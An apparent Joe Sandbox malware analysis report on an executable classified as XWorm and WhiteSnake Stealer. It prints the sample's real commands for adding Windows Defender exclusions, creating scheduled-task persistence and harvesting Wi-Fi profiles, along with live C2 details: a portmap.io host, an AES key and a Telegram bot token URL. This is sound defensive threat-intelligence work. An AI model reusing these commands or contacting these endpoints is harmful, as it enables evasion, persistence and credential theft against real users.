Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yt7dW9nyJK.exe

Overview

General Information

Sample name:yt7dW9nyJK.exe
renamed because original name is a hash value
Original sample name:adbe420a49db30f75d4665ea0014af43.exe
Analysis ID:1479415
MD5:adbe420a49db30f75d4665ea0014af43
SHA1:ed38f3bf9c5e56110cdf8c686bffee54128c51d6
SHA256:b851e1ad3f4882815c89fa7754ed5dc89edfc0c2ea873a83a19f65299566e46d
Tags:32AsyncRATexetrojan
Infos:

Detection

WhiteSnake Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found Tor onion address
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
May use the Tor software to hide its network traffic
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • yt7dW9nyJK.exe (PID: 5576 cmdline: "C:\Users\user\Desktop\yt7dW9nyJK.exe" MD5: ADBE420A49DB30F75D4665EA0014AF43)
    • powershell.exe (PID: 6716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • yt7dW9nyJK.exe (PID: 2672 cmdline: "C:\Users\user\Desktop\yt7dW9nyJK.exe" MD5: ADBE420A49DB30F75D4665EA0014AF43)
      • powershell.exe (PID: 7352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ffmaba.exe (PID: 7784 cmdline: "C:\Users\user\AppData\Local\Temp\ffmaba.exe" MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
        • powershell.exe (PID: 7876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8024 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 8084 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • timeout.exe (PID: 8108 cmdline: timeout /t 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • schtasks.exe (PID: 320 cmdline: schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • ffmaba.exe (PID: 5624 cmdline: "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
            • powershell.exe (PID: 7236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tor-real.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt" MD5: 07244A2C002FFDF1986B454429EACE0B)
              • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5380 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7988 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
              • netsh.exe (PID: 7956 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • findstr.exe (PID: 8172 cmdline: findstr /R /C:"[ ]:[ ]" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 7920 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7780 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
              • netsh.exe (PID: 7800 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • findstr.exe (PID: 7816 cmdline: findstr "SSID BSSID Signal" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
  • ffmaba.exe (PID: 2300 cmdline: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
    • powershell.exe (PID: 6096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ffmaba.exe (PID: 4616 cmdline: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
    • powershell.exe (PID: 7420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ffmaba.exe (PID: 5260 cmdline: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
    • powershell.exe (PID: 6104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ffmaba.exe (PID: 6432 cmdline: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
    • powershell.exe (PID: 5796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["securefirewall.portmap.io"], "Port": "31510", "Aes key": "<19670122>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x601f0:$s6: VirtualBox
      • 0x73ad0:$s6: VirtualBox
      • 0x87940:$s6: VirtualBox
      • 0x6014e:$s8: Win32_ComputerSystem
      • 0x73a2e:$s8: Win32_ComputerSystem
      • 0x8789e:$s8: Win32_ComputerSystem
      • 0x63184:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x76a64:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8a8d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x63221:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x76b01:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x8a971:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x63336:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x76c16:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x8aa86:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x62630:$cnc4: POST / HTTP/1.1
      • 0x75f10:$cnc4: POST / HTTP/1.1
      • 0x89d80:$cnc4: POST / HTTP/1.1
      00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 10 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.yt7dW9nyJK.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            4.2.yt7dW9nyJK.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              4.2.yt7dW9nyJK.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xe130:$s6: VirtualBox
              • 0xe08e:$s8: Win32_ComputerSystem
              • 0x110c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x11161:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x11276:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x10570:$cnc4: POST / HTTP/1.1
              0.2.yt7dW9nyJK.exe.261d0c0.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.2.yt7dW9nyJK.exe.261d0c0.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xc330:$s6: VirtualBox
                • 0xc28e:$s8: Win32_ComputerSystem
                • 0xf2c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xf361:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xf476:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xe770:$cnc4: POST / HTTP/1.1
                Click to see the 8 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ffmaba.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ffmaba.exe, ParentProcessId: 7784, ParentProcessName: ffmaba.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe", ProcessId: 8024, ProcessName: cmd.exe
                Sigma detected: Invoke-Obfuscation VAR+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ffmaba.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ffmaba.exe, ParentProcessId: 7784, ParentProcessName: ffmaba.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe", ProcessId: 8024, ProcessName: cmd.exe
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yt7dW9nyJK.exe", ParentImage: C:\Users\user\Desktop\yt7dW9nyJK.exe, ParentProcessId: 5576, ParentProcessName: yt7dW9nyJK.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", ProcessId: 6716, ProcessName: powershell.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ffmaba.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ffmaba.exe, ParentProcessId: 7784, ParentProcessName: ffmaba.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe", ProcessId: 7876, ProcessName: powershell.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yt7dW9nyJK.exe", ParentImage: C:\Users\user\Desktop\yt7dW9nyJK.exe, ParentProcessId: 2672, ParentProcessName: yt7dW9nyJK.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe', ProcessId: 7352, ProcessName: powershell.exe
                Sigma detected: Communication To Uncommon Destination Ports
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.119.118.59, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, Initiated: true, ProcessId: 5624, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49726
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yt7dW9nyJK.exe", ParentImage: C:\Users\user\Desktop\yt7dW9nyJK.exe, ParentProcessId: 5576, ParentProcessName: yt7dW9nyJK.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", ProcessId: 6716, ProcessName: powershell.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f , CommandLine: schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f , CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8024, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f , ProcessId: 320, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yt7dW9nyJK.exe", ParentImage: C:\Users\user\Desktop\yt7dW9nyJK.exe, ParentProcessId: 5576, ParentProcessName: yt7dW9nyJK.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", ProcessId: 6716, ProcessName: powershell.exe

                Stealing of Sensitive Information

                barindex
                Sigma detected: Capture Wi-Fi password
                Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" , ParentImage: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, ParentProcessId: 5624, ParentProcessName: ffmaba.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 5380, ProcessName: cmd.exe

                Snort Signatures

                No Snort rule has matched

                Suricata Signatures

                Timestamp:2024-07-23T15:48:17.144145+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:08.115309+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:00.111643+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
